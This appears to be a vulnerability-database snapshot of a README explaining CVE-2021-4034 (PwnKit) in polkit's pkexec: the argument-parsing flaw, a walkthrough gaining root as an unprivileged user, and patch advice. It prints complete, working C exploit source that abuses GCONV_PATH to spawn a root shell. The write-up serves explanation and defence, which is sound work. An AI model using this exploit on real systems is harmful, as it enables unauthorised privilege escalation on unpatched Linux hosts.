关联漏洞
标题:
polkit 缓冲区错误漏洞
(CVE-2021-4034)
描述:polkit是一个在类 Unix操作系统中控制系统范围权限的组件。通过定义和审核权限规则,实现不同优先级进程间的通讯。 polkit 的 pkexec application存在缓冲区错误漏洞,攻击者可利用该漏洞通过精心设计环境变量诱导pkexec执行任意代码。成功执行攻击后,如果目标计算机上没有权限的用户拥有管理权限,攻击可能会导致本地权限升级。
描述
Local Privilege Escalation (LPE) vulnerability in Polkit - Pwnkit
介绍
# Pwnkit Vulnerability - CVE-2021-4034 :green_book:
### Introduction
Discovered in 2021 but announced and disclosed in January 2022, **CVE-2021-4034** was affectionately named Pwnkit, however, it is available in all versions of the **Policy Toolkit - Polkit package** in practically all OS - Linux distributions. In short, this vulnerability allows any unprivileged attacker to vertically elevate their access to OS administrator.
> [!IMPORTANT]
> We can find this vulnerability in pkexec version 0.105 or earlier.
Even though it is a highly critical CVE, classified with a **<font color="red">CVSS score of 7.8 points</font>** according to **NIST.GOV**, it is only exploited locally, that is, it is not possible to exploit it remotely (Web access).
<p align="center">
<img width="400" height="300" src="./img/1.png">
</p>
### What is Polkit :question:
Polkit acts as a Linux authorization system. When you have a user who has little privilege and needs to perform some task that needs high privilege (admin for example), polkit checks if your user has required permission.
For example, with the PKexec utilitarian, we can call the polkit function, which checks permission and asks for password if it does not have. As in the example below;
<p align="center">
<img width="500" height="190" src="./img/2.png">
</p>
## Explaining the Exploration :warning:
As shown above, Pwnkit vulnerability exists in PKexec (in the permission checking process), for this vulnerability, there is no security in the deals with parameters when PKexec is performed by command line (CLI), where it allows the invader to manipulate the environment And a flaw occurs called **"Out-of-Bounds Write"**.
The PKexec attempts to parse any command-line arguments that we pass it using a for-loop, starting at an index of 1 to offset the name of the program and obtain the first real argument. The name of the program is irrelevant to argument parsing, so the indexing is simply offset to ignore it.
So if we do not define any arguments, the index is automatically defined to 1.
Let's create an example below.
```
for(n=1; n < number_of_arguments; n++){
}
```
If the number of arguments is 0 then 'N' is never less than the number of arguments. As such, 'N' stays equal to one and the loop is **<font color="green">Bypassed Completely</font>** , the loop will not happen.
As there are no command-line arguments, there is no argument at index n — instead the program overwrites the next thing in memory, which just so happens to be the first value in the list of environment variables when the program is called using a C function called execve(). In other words, by passing PKexec a null list of arguments, we can force it to overwrite an environment.
## Let's Explore !!! :pencil2:
There are several ways and various internet scripts that easily exploit this vulnerability. To customize time, we will use a script created in C executing this vulnerability of our friend **Arthepsy's** repository.
This script explores the variable ```GCONV_PATH``` to include a shared object that calls /bin/sh as root.
[Arthepsy - CVE-2021-4034 - exploit.c](https://github.com/arthepsy/CVE-2021-4034)
Before you run the script, we will check your access to the vulnerable host.
<p align="center">
<img width="500" height="100" src="./img/3.png">
</p>
We have a 1000 user (no root) and we can't perform specifying administrator functions, such as Useradd.
* Let's Burn :fire:
<p align="center">
<img width="500" height="150" src="./img/4.png">
</p>
We got access to the root user and managed to execute some functions like Useradd (the error refers to another problem, but we were able to perform the process as root).
Done :heavy_check_mark:
## Just a Little More Analysis :bulb:
To conclude this exploration, we can quickly take a look at the script exploit below;
```
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
char *shell =
"#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n\n"
"void gconv() {}\n"
"void gconv_init() {\n"
" setuid(0); setgid(0);\n"
" seteuid(0); setegid(0);\n"
" system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
" exit(0);\n"
"}";
int main(int argc, char *argv[]) {
FILE *fp;
system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
fp = fopen("pwnkit/pwnkit.c", "w");
fprintf(fp, "%s", shell);
fclose(fp);
system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
execve("/usr/bin/pkexec", (char*[]){NULL}, env);
}
```
It basically exploits the previously commented PKexec arguments and rewrites the ```GCONV_PATH``` environment variable with /bin/sh and setting stuid(0) (root).
## Patching :white_check_mark:
There are already corrected versions available on the OS package itself, performing only the ```sudo apt update && sudo apt upgrade``` commands, it is already possible to correct this problem of your system.
文件快照
[4.0K] /data/pocs/296ba6c130567c096c6f51979401b1869f51066a
├── [4.0K] img
│ ├── [252K] 1.png
│ ├── [ 41K] 2.png
│ ├── [ 25K] 3.png
│ └── [ 23K] 4.png
└── [5.1K] README.md
1 directory, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。